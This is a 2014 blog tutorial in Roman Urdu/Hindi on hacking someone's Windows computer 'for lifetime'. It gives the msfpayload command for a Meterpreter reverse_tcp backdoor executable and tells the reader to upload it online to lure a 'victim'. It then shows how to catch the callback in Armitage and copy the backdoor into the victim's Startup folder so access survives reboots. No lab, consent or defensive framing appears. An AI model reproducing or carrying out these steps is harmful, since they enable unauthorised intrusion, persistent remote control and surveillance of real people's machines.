Monday 24 March 2014

Hack Computer For Life Time In Urdu Hindi

Assalamoalikum wr wb , 

 Umeed hy ap sab theek hongy ,
       Well hum ajj sekhengy ky kasy hum kisi bhi pc ko Hack karty han wo bhi lifetime ky liye asan hi hy bas commands ko follow karny ky bjaye ap in sab Commands ko yad kar leyn to ziyada bahtar hoga aor samajh leyn 

Note " Sab commands Ky liye mein Red colour Use karonga And ap ki samajh mein a jay sath sath type karky btata bhi rahoonga...
Ap sab ka apna Dost      @Khaksaar 

To Sab sy pahly hum Armitage ko open karny ka tariqa sekhengy First Step Open Your Terminal And Type in >armitage < And Hit Enter.. 

Us Ky Bad Thora Intezar karny ky bad 1 choti si window khully gi jis mein Ip Add aor Port Likha ho ga us ko ok kar deyngy koi bhi changing nahi karengy again Yes or No Wala boX khully ga us Ko bhi Yes kar denna hy and thora sa Wait karny Ky Bad.. 
Humari BackTrack ki screen par humara Armitage open ho jay ga Us ky Bad armitage ko minimize Kar ky Choor Dyngy.. 
Aor Phir Hum Apni BackDoor File BnayengyJis ki maddad sy hum kisi ko bhi Hack Karengy Ess Commands ki Maddad Sy Aor Hum Jo File Bnayengy..
Wo File Humari Root Folder Mein Automatic Save HOo Jay Gi > > Backdoor File Bnany Ki Command Yea Hy..
Command > 
msfpayload windows/meterpreter/reverse_tcp LHOST=Your BackTrack Ifconfig ip LPORT=Your Port X > Your file name.exe

And Just HiT enter.. 
Thory sy process ky Bad ap ki file ban jay Gi..
               


                          """Important Notice"""

Mein apna Modem Use kar Raha hoon Es Liye Mein nay IfConfig Mein Sy apni Lan Ip LHOST ky samny donga and LPORT ky samny apna port Donga 
Port Forwording : 1 asan sa Tariqa hy Us katariqa Mein Alag Sy Tut Mein Bnna Kar Dy Doonga Khair Jo Log Wifi Use Kar Rahy Han Un Ko Apni Wlan wali ip LHOST KY SAMNY = Ky Bad Likhengy Yea Important Hy Warna Ap Ki File Kam Nahi Kary Gi... 


Humari File Ab Ban Chukki Hy Jo Ky Root Folder Mein Save Ho Gai Hy Ap Wahan Sy Apni File Ko Kaheen Sy Bhi Online Upload Kar Dyngy And Apna Shikar Dondengay Khair Ap Ki File Ban Chukki Hy Aor Ab Ap ko Apny Armitage Mein Ja Kar Upar Dekhna Hy 1 Option Ho Ga 


Armitage   ky name sy us ko khilengy and 5th wala option Listeners Mein Jayengy And wahan sy Reverse ( wait for ) par click karna hy Yahan Humien Apna Port Dena Hy Jo Hum Virtual mein bnayengy And >> Type << waly BoX mein >> Meterpreter << Yea select Karny Ky Bad Hum Wait Karty Han Ky Koi Us File Py Click Karta Hy Jasy Hi Ap Ki file Py koi Click Kary Ga Ap Ki Armitage Ki Nechy Black Screen Mein 1 Line Chal Jay Gi Like Aysy >>> 



Meterpreter session 3 opned ( Victim ip -> again ip ) at Date Time +0100 




Jab Humara Victim System show ho jay ga to hum us ko Life Time Ky Liye Hack Karengy Ky Wo Agar Kabhi system restart karta hy to ap ky pass us ka system Still Hack Rahy ga.. 
Us Ky Liye hum yea info command Use karengy  >>



C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


                                           " Note "
Uper wali line  Command mein ap ko jo username nazar a raha hy White colour ka yahan hum apny victim ky Pc Ka User Name Dalengy username ki jagan like aysy next line mein change dekh leyn ap sab.. 



C:\Users\Your victim system name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 



Ab ap Sochengy ky user name khan sy ayy ga us ky liye hum jab system ko hack karty hn to wahan chota sa moniter show hota hy humien Victim ka us ky nichy puri detail hoti hy us ka username wahan sy dekh leyn so agy chalty han... 


Ab Humien Victim ki StartUp Directory Mein jana hy aor humary Pass Command yan Location code a chukka hy to Hum Ab apny 
                              BackTrack Armitage ki window kholengy aor apny Victim ky pc par Right Click Karengy aor wahan sy 1st Option Meterpteter 2 mein jayiengy phir 3rd option Explore mein jayengy and Browse Files 
                          Par Click Karty Hi Humary Pas Armitage Ki window mein nechy Pannel khul jay ga wahan hum apni yea wali command dalengy aor enter marenGy 

Command > 

C:\Users\Your victim system name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Us Ky Bad Humien Ini File Nazar Ayy Gi Aor Yahn Es Folder Mein Hum Apna BackDoor Ki File Ko Upload Ky Option Ki Madad Sy Upload Karengy..


Ab Jasy Hi Humari File uPload ho jay gi Es Folder Mein to System Hack Rahy Ga Hamesha Ky Liye Aor Hamesha Restart Hony Par Yea Humari BackDoor File Ko Automatic Run Kar Diya Kary Ga.. Ajj Ky Liye Bass Itna Hi Umeed Hy Ap Ko Samajh Aaa Jay Gi Jald Hi..
                           
                                             InshAllah.. 





Note : Wo Commands Jo Hum Nay Lgani Han Un Ko Mein Red Colour Mein Type Karonga 




Source : http://linux-commands-backtrack.blogspot.com 



Port Forwording Ky Liye Mein Jald Hi Web Site Py TuT Bnna Donga.. 
                         Thanks.. 

  





    PAKISTAN ZINDABAD PAKISTAN PAINDABAD

No comments:

Post a Comment